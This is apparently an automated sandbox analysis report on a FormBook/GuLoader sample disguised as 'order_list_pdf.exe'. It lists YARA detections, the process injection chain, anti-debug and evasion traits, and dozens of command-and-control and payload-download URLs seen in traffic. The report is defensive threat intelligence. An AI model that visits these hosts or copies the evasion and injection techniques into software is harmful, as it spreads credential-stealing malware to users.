
Analysis Report order_list_pdf.exe

Overview

General Information

Sample Name: order_list_pdf.exe
Analysis ID: 246514
MD5: 1cdb3e9a718706655bdf8337cc0745aa
SHA1: a00c20391b1d7cc9e78d9ac1ea8c20c8151dc491
SHA256: 467188d082df27c66676757668738a51c3c5727ebc09031d1eac8ead8289b5cc

Detection

FormBook GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Yara detected Generic Dropper
Yara detected GuLoader
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Contains functionality to hide a thread from the debugger
Hides threads from debuggers
Initial sample is a PE file and has a suspicious name
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • order_list_pdf.exe (PID: 3644 cmdline: 'C:\Users\user\Desktop\order_list_pdf.exe' MD5: 1CDB3E9A718706655BDF8337CC0745AA)
    • order_list_pdf.exe (PID: 4496 cmdline: 'C:\Users\user\Desktop\order_list_pdf.exe' MD5: 1CDB3E9A718706655BDF8337CC0745AA)
      • explorer.exe (PID: 3024 cmdline: MD5: E4A81EDDFF8B844D85C8B45354E4144E)
        • autoconv.exe (PID: 1408 cmdline: C:\Windows\SysWOW64\autoconv.exe MD5: DA2CA3F51A68447F78C6F6BE53AF1BC0)
        • help.exe (PID: 3908 cmdline: C:\Windows\SysWOW64\help.exe MD5: 09A715036F14D3632AD03B52D1DA6BFF)
          • cmd.exe (PID: 1520 cmdline: /c del 'C:\Users\user\Desktop\order_list_pdf.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 4516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source: 00000004.00000002.664784374.00000000000A0000.00000040.00000001.sdmp
Rule: JoeSecurity_FormBook
Description: Yara detected FormBook
Author: Joe Security

Source: 00000004.00000002.664784374.00000000000A0000.00000040.00000001.sdmp
Rule: Formbook
Description: detect Formbook in memory
Author: JPCERT/CC Incident Response Group
Strings:
  • 0x157d9:$sqlite3step: 68 34 1C 7B E1
  • 0x158ec:$sqlite3step: 68 34 1C 7B E1
  • 0x15808:$sqlite3text: 68 38 2A 90 C5
  • 0x1592d:$sqlite3text: 68 38 2A 90 C5
  • 0x1581b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x15943:$sqlite3blob: 68 53 D8 7F 8C

Source: 00000004.00000002.664784374.00000000000A0000.00000040.00000001.sdmp
Rule: Formbook_1
Description: autogenerated rule brought to you by yara-signator
Author: Felix Bilstein - yara-signator at cocacoding dot com
Strings:
  • 0x7248:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x74c2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x12b55:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x12641:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x12c57:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x12dcf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x804a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x118bc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x89e3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x17ec7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x18eca:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Source: 00000007.00000002.842795531.00000000036BE000.00000004.00000001.sdmp
Rule: LokiBot_Dropper_Packed_R11_Feb18
Description: Auto-generated rule - file scan copy.pdf.r11
Author: Florian Roth
Strings:
  • 0x2140:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB

Source: 00000004.00000002.672129627.000000001DE50000.00000040.00000001.sdmp
Rule: JoeSecurity_FormBook
Description: Yara detected FormBook
Author: Joe Security

16 further entries not shown.

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Multi AV Scanner detection for domain / URL
  Source: http://www.regulars5.com | Virustotal: Detection: 6%
  Source: http://www.regulars5.com/kms8/ | Virustotal: Detection: 6%
Multi AV Scanner detection for submitted file
  Source: order_list_pdf.exe | Virustotal: Detection: 59%
  Source: order_list_pdf.exe | Metadefender: Detection: 13%
  Source: order_list_pdf.exe | ReversingLabs: Detection: 58%
Yara detected FormBook
  Source: Yara match | File source: 00000004.00000002.664784374.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
  Source: Yara match | File source: 00000004.00000002.672129627.000000001DE50000.00000040.00000001.sdmp, type: MEMORY
  Source: Yara match | File source: 00000007.00000002.839035767.0000000000AF0000.00000040.00000001.sdmp, type: MEMORY
  Source: Yara match | File source: 00000007.00000002.839087655.0000000000B20000.00000040.00000001.sdmp, type: MEMORY
  Source: Yara match | File source: 00000007.00000002.839147457.0000000000B60000.00000004.00000001.sdmp, type: MEMORY
  Source: global traffic | HTTP traffic detected: GET /kms8/?apuPip=Y2JhzpXP&qb4tMX=DXkzu0J/rYE3zqsuL8zi26zQMZt425xXsgfCpDmfzAdnLXrajI+t3zm9a4sWgfiT0xno HTTP/1.1 | Host: www.nicromanelli.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
  Source: global traffic | HTTP traffic detected: GET /wp-/bin_iwlTOFWjHT250.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: www.echipamenteacvarii.ro | Cache-Control: no-cache
  Source: C:\Windows\explorer.exe | Code function: 5_2_05FFA5A2 getaddrinfo,setsockopt,recv,5_2_05FFA5A2
  Source: unknown | DNS traffic detected: queries for: www.echipamenteacvarii.ro
  Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Sat, 18 Jul 2020 15:04:13 GMT | Content-Type: text/html; charset=UTF-8 | Content-Length: 45013 | Connection: close | Server: Apache/2 | X-Powered-By: PHP/5.5.22 | Expires: Wed, 11 Jan 1984 05:00:00 GMT | Cache-Control: no-transform, no-cache, no-store, must-revalidate | Link: <http://www.anthonyromanelli.com/i/wp-json/>; rel="https://api.w.org/" | Accept-Ranges: bytes | Age: 0 | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 61 6e 74 68 6f 6e 79 72 6f 6d 61 6e 65 6c 6c 69 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 77 77 77 2e 61 6e 74 68 6f 6e 79 72 6f 6d 61 6e 65 6c 6c 69 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 73 2e 77 2e 6f 72 67 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 61 6e 74 68 6f 6e 79 72 6f 6d 61 6e 65 6c 6c 69 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 6e 74 68 6f 6e 79 72 6f 6d 61 6e 65 6c 6c 69 2e 63 6f 6d 2f 69 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 61 6e 74 68 6f 6e 79 72 6f 6d 61 6e 65 6c 6c 69 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 6e 74 68 6f 6e 79 72 6f 6d 61 6e 65 6c 6c 69 2e 63 6f 6d 2f 69 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 09 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 31 2e 32 2e 30 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a
  Source: order_list_pdf.exe, 00000004.00000002.665507432.00000000009B5000.00000004.00000020.sdmp | String found in binary or memory: http://ctldl.windowsupacvarii.ro/wp-/bin_iwlTOFWjHT250.bin
  Source: explorer.exe, 00000005.00000002.876315572.000000000CCF6000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
  Source: explorer.exe, 00000005.00000002.843406993.00000000034B0000.00000004.00000001.sdmp | String found in binary or memory: http://ns.ado
  Source: explorer.exe, 00000005.00000002.843992126.00000000036C0000.00000002.00000001.sdmp | String found in binary or memory: http://www.%s.comPA
  Source: explorer.exe, 00000005.00000000.648081645.000000000CCF6000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
  Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmp | String found in binary or memory: http://www.barzlab.com
  Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmp | String found in binary or memory: http://www.barzlab.com/kms8/
  Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmp | String found in binary or memory: http://www.barzlab.com/kms8/www.savehebron.red
  Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmp | String found in binary or memory: http://www.barzlab.comReferer:
  Source: explorer.exe, 00000005.00000000.648081645.000000000CCF6000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
  Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmp | String found in binary or memory: http://www.cuadpro.net
  Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmp | String found in binary or memory: http://www.cuadpro.net/kms8/
  Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmp | String found in binary or memory: http://www.cuadpro.net/kms8/www.rockstarbonus.com
  Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmp | String found in binary or memory: http://www.cuadpro.netReferer:
  Source: order_list_pdf.exe, 00000004.00000002.665507432.00000000009B5000.00000004.00000020.sdmp | String found in binary or memory: http://www.echipamenteacvarii.ro/
  Source: order_list_pdf.exe, 00000004.00000003.663871178.00000000009C4000.00000004.00000001.sdmp, order_list_pdf.exe, 00000004.00000002.665443045.0000000000987000.00000004.00000020.sdmp | String found in binary or memory: http://www.echipamenteacvarii.ro/wp-/bin_iwlTOFWjHT250.bin
  Source: order_list_pdf.exe, 00000004.00000002.665443045.0000000000987000.00000004.00000020.sdmp | String found in binary or memory: http://www.echipamenteacvarii.ro/wp-/bin_iwlTOFWjHT250.binN
  Source: order_list_pdf.exe, 00000004.00000002.665443045.0000000000987000.00000004.00000020.sdmp | String found in binary or memory: http://www.echipamenteacvarii.ro/wp-/bin_iwlTOFWjHT250.binamG
  Source: explorer.exe, 00000005.00000002.876315572.000000000CCF6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
  Source: explorer.exe, 00000005.00000002.876315572.000000000CCF6000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
  Source: explorer.exe, 00000005.00000002.876315572.000000000CCF6000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
  Source: explorer.exe, 00000005.00000002.876315572.000000000CCF6000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
  Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmp | String found in binary or memory: http://www.goldentouch.online
  Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmp | String found in binary or memory: http://www.goldentouch.online/kms8/
  Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmp | String found in binary or memory: http://www.goldentouch.online/kms8/www.barzlab.com
  Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmp | String found in binary or memory: http://www.goldentouch.onlineReferer:
  Source: explorer.exe, 00000005.00000002.876315572.000000000CCF6000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
  Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmp | String found in binary or memory: http://www.html5technologies.com
  Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmp | String found in binary or memory: http://www.html5technologies.com/kms8/
  Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmp | String found in binary or memory: http://www.html5technologies.com/kms8/www.mortab.net
  Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmp | String found in binary or memory: http://www.html5technologies.comReferer:
  Source: explorer.exe, 00000005.00000000.648081645.000000000CCF6000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
  Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmp | String found in binary or memory: http://www.lyonpendule.com
  Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmp | String found in binary or memory: http://www.lyonpendule.com/kms8/
  Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmp | String found in binary or memory: http://www.lyonpendule.com/kms8/u7Q
  Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmp | String found in binary or memory: http://www.lyonpendule.comReferer:
  Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmp | String found in binary or memory: http://www.mortab.net
  Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmp | String found in binary or memory: http://www.mortab.net/kms8/
  Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmp | String found in binary or memory: http://www.mortab.net/kms8/www.syxauto.com
  Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmp | String found in binary or memory: http://www.mortab.netReferer:
  Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmp | String found in binary or memory: http://www.nicromanelli.com
  Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmp | String found in binary or memory: http://www.nicromanelli.com/kms8/
  Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmp | String found in binary or memory: http://www.nicromanelli.com/kms8/www.cuadpro.net
  Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmp | String found in binary or memory: http://www.nicromanelli.comReferer:
  Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmp | String found in binary or memory: http://www.regulars5.com
  Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmp | String found in binary or memory: http://www.regulars5.com/kms8/
  Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmp | String found in binary or memory: http://www.regulars5.com/kms8/www.lyonpendule.com
  Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmp | String found in binary or memory: http://www.regulars5.comReferer:
  Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmp | String found in binary or memory: http://www.rockstarbonus.com
  Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmp | String found in binary or memory: http://www.rockstarbonus.com/kms8/
  Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmp | String found in binary or memory: http://www.rockstarbonus.com/kms8/www.voyalo.com
  Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmp | String found in binary or memory: http://www.rockstarbonus.comReferer:
  Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmp | String found in binary or memory: http://www.safetraffic2upgrades.download
  Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmp | String found in binary or memory: http://www.safetraffic2upgrades.download/kms8/
  Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmp | String found in binary or memory: http://www.safetraffic2upgrades.download/kms8/www.stevenranellone.net
  Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmp | String found in binary or memory: http://www.safetraffic2upgrades.downloadReferer:
  Source: explorer.exe, 00000005.00000002.876315572.000000000CCF6000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
  Source: explorer.exe, 00000005.00000000.648081645.000000000CCF6000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
  Source: explorer.exe, 00000005.00000002.876315572.000000000CCF6000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
  Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmp | String found in binary or memory: http://www.savehebron.red
  Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmp | String found in binary or memory: http://www.savehebron.red/kms8/
  Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmp | String found in binary or memory: http://www.savehebron.red/kms8/www.safetraffic2upgrades.download
  Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmp | String found in binary or memory: http://www.savehebron.redReferer:
  Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmp | String found in binary or memory: http://www.spartanbulk.com
  Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmp | String found in binary or memory: http://www.spartanbulk.com/kms8/
  Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmp | String found in binary or memory: http://www.spartanbulk.com/kms8/www.html5technologies.com
  Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmp | String found in binary or memory: http://www.spartanbulk.comReferer:
  Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmp | String found in binary or memory: http://www.stevenranellone.net
  Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmp | String found in binary or memory: http://www.stevenranellone.net/kms8/
  Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmp | String found in binary or memory: http://www.stevenranellone.net/kms8/www.xiaochenshuiwu.com
  Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmp | String found in binary or memory: http://www.stevenranellone.netReferer:
  Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmp | String found in binary or memory: http://www.syxauto.com
  Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmp | String found in binary or memory: http://www.syxauto.com/kms8/
  Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmp | String found in binary or memory: http://www.syxauto.com/kms8/www.goldentouch.online
  Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmp | String found in binary or memory: http://www.syxauto.comReferer:
  Source: explorer.exe, 00000005.00000002.876315572.000000000CCF6000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.648081645.000000000CCF6000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
  Source: explorer.exe, 00000005.00000002.876315572.000000000CCF6000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
  Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmp | String found in binary or memory: http://www.voyalo.com
  Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmp | String found in binary or memory: http://www.voyalo.com/kms8/
  Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmp | String found in binary or memory: http://www.voyalo.com/kms8/www.spartanbulk.com
  Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmp | String found in binary or memory: http://www.voyalo.comReferer:
  Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmp | String found in binary or memory: http://www.xiaochenshuiwu.com
  Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmp | String found in binary or memory: http://www.xiaochenshuiwu.com/kms8/
  Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmp | String found in binary or memory: http://www.xiaochenshuiwu.com/kms8/www.regulars5.com
  Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmp | String found in binary or memory: http://www.xiaochenshuiwu.comReferer:
  Source: explorer.exe, 00000005.00000000.648081645.000000000CCF6000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn

E-Banking Fraud:

Yara detected FormBook
  Source: Yara match | File source: 00000004.00000002.664784374.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
  Source: Yara match | File source: 00000004.00000002.672129627.000000001DE50000.00000040.00000001.sdmp, type: MEMORY
  Source: Yara match | File source: 00000007.00000002.839035767.0000000000AF0000.00000040.00000001.sdmp, type: MEMORY
  Source: Yara match | File source: 00000007.00000002.839087655.0000000000B20000.00000040.00000001.sdmp, type: MEMORY
  Source: Yara match | File source: 00000007.00000002.839147457.0000000000B60000.00000004.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)
  Source: 00000004.00000002.664784374.00000000000A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
  Source: 00000004.00000002.664784374.00000000000A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
  Source: 00000007.00000002.842795531.00000000036BE000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Auto-generated rule - file scan copy.pdf.r11 | Author: Florian Roth
  Source: 00000004.00000002.672129627.000000001DE50000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
  Source: 00000004.00000002.672129627.000000001DE50000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
  Source: 00000007.00000002.839035767.0000000000AF0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
  Source: 00000007.00000002.839035767.0000000000AF0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
  Source: 00000007.00000002.839087655.0000000000B20000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
  Source: 00000007.00000002.839087655.0000000000B20000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
  Source: 00000007.00000002.839927203.0000000002CCC000.00000004.00000020.sdmp, type: MEMORY | Matched rule: Auto-generated rule - file scan copy.pdf.r11 | Author: Florian Roth
  Source: 00000007.00000002.839147457.0000000000B60000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
  Source: 00000007.00000002.839147457.0000000000B60000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Initial sample is a PE file and has a suspicious name
  Source: initial sample | Static PE information: Filename: order_list_pdf.exe
  Source: C:\Users\user\Desktop\order_list_pdf.exe | Process Stats: CPU usage > 98%
  Source: C:\Users\user\Desktop\order_list_pdf.exe | Code function: 0_2_020983FD NtResumeThread,0_2_020983FD
  Source: C:\Users\user\Desktop\order_list_pdf.exe | Code function: 0_2_02096054 NtWriteVirtualMemory,0_2_02096054
  Source: C:\Users\user\Desktop\order_list_pdf.exe | Code function: 0_2_02093E09 NtSetInformationThread,TerminateProcess,CreateFileA,0_2_02093E09
  Source: C:\Users\user\Desktop\order_list_pdf.exe | Code function: 0_2_020906B7 EnumWindows,NtSetInformationThread,TerminateProcess,0_2_020906B7
  Source: C:\Users\user\Desktop\order_list_pdf.exe | Code function: 0_2_02097EEB NtProtectVirtualMemory,0_2_02097EEB
  Source: C:\Users\user\Desktop\order_list_pdf.exe | Code function: 0_2_02093721 NtSetInformationThread,TerminateProcess,0_2_02093721
  Source: C:\Users\user\Desktop\order_list_pdf.exe | Code function: 0_2_020914C3 NtSetInformationThread,TerminateProcess,0_2_020914C3
  Source: C:\Users\user\Desktop\order_list_pdf.exe | Code function: 0_2_02098A07 NtResumeThread,0_2_02098A07
  Source: C:\Users\user\Desktop\order_list_pdf.exe | Code function: 0_2_0209321B NtWriteVirtualMemory,0_2_0209321B
  Source: C:\Users\user\Desktop\order_list_pdf.exe | Code function: 0_2_02091313 NtSetInformationThread,TerminateProcess,0_2_02091313
  Source: C:\Users\user\Desktop\order_list_pdf.exe | Code function: 0_2_02093B3E NtSetInformationThread,TerminateProcess,0_2_02093B3E
  Source: C:\Users\user\Desktop\order_list_pdf.exe | Code function: 0_2_0209336B NtWriteVirtualMemory,0_2_0209336B
  Source: C:\Users\user\Desktop\order_list_pdf.exe | Code function: 0_2_02091B6A NtSetInformationThread,TerminateProcess,0_2_02091B6A
  Source: C:\Users\user\Desktop\order_list_pdf.exe | Code function: 0_2_020988AC NtResumeThread,0_2_020988AC
  Source: C:\Users\user\Desktop\order_list_pdf.exe | Code function: 0_2_020930E0 NtWriteVirtualMemory,0_2_020930E0
  Source: C:\Users\user\Desktop\order_list_pdf.exe | Code function: 0_2_0209391D NtSetInformationThread,TerminateProcess,0_2_0209391D
  Source: C:\Users\user\Desktop\order_list_pdf.exe | Code function: 0_2_020969C0 NtWriteVirtualMemory,0_2_020969C0
  Source: C:\Users\user\Desktop\order_list_pdf.exe | Code function: 0_2_02092E79 NtWriteVirtualMemory,0_2_02092E79
  Source: C:\Users\user\Desktop\order_list_pdf.exe | Code function: 0_2_02098677 NtResumeThread,0_2_02098677
  Source: C:\Users\user\Desktop\order_list_pdf.exe | Code function: 0_2_02090E94 NtSetInformationThread,TerminateProcess,0_2_02090E94
  Source: C:\Users\user\Desktop\order_list_pdf.exe | Code function: 0_2_020936A8 NtSetInformationThread,TerminateProcess,0_2_020936A8
  Source: C:\Users\user\Desktop\order_list_pdf.exe | Code function: 0_2_020926FC NtSetInformationThread,TerminateProcess,0_2_020926FC
  Source: C:\Users\user\Desktop\order_list_pdf.exe | Code function: 0_2_0209870F NtResumeThread,0_2_0209870F
